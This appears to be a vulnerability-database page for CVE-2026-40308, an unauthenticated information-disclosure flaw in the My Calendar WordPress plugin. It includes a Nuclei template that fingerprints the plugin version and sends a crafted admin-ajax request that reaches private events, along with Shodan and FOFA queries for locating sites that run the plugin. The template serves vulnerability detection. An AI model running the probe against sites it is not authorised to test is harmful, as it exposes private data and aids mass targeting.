| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2026-40308 | 16 Apr 202621:30 | – | attackerkb | |
| CVE-2026-40308 | 16 Apr 202617:52 | – | circl | |
| WordPress plugin My Calendar 安全漏洞 | 16 Apr 202600:00 | – | cnnvd | |
| CVE-2026-40308 | 16 Apr 202621:30 | – | cve | |
| CVE-2026-40308 My Calendar: Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog | 16 Apr 202621:30 | – | cvelist | |
| EUVD-2026-23306 | 16 Apr 202621:30 | – | euvd | |
| Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog in My Calendar | 16 Apr 202621:34 | – | github | |
| CVE-2026-40308 | 16 Apr 202622:16 | – | nvd | |
| GHSA-2MVX-F5QM-V2CH Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog in My Calendar | 16 Apr 202621:34 | – | osv | |
| PT-2026-33370 | 16 Apr 202600:00 | – | ptsecurity |
id: CVE-2026-40308
info:
name: My Calendar WordPress Plugin - Information Disclosure
author: theamanrawat
severity: high
description: |
My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup.
impact: |
Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations.
remediation: |
Update to version 3.7.7 or later.
reference:
- https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch
- https://nvd.nist.gov/vuln/detail/CVE-2026-40308
classification:
cve-id: CVE-2026-40308
epss-score: 0.00932
epss-percentile: 0.56312
cwe-id: CWE-639
metadata:
verified: true
max-request: 2
vendor: joedolson
product: my-calendar
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/my-calendar/"
fofa-query: body="/wp-content/plugins/my-calendar/" && title="WordPress"
tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "My Calendar"
- "Stable tag:"
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- '(?m)Stable tag:\s*([0-9.]+)'
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<= 3.7.6")'
- 'contains_all(body, "\"success\":1", "response")'
- 'status_code == 200'
condition: and
# digest: 4b0a0048304602210090a9e70c1360f66288256592c59b72c140ffcc35c76ae6c5cee669d2c8cd9a4c022100e861ec703949d38000bd7b06f4b81636135e47c333e590a794536802df2fc944:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation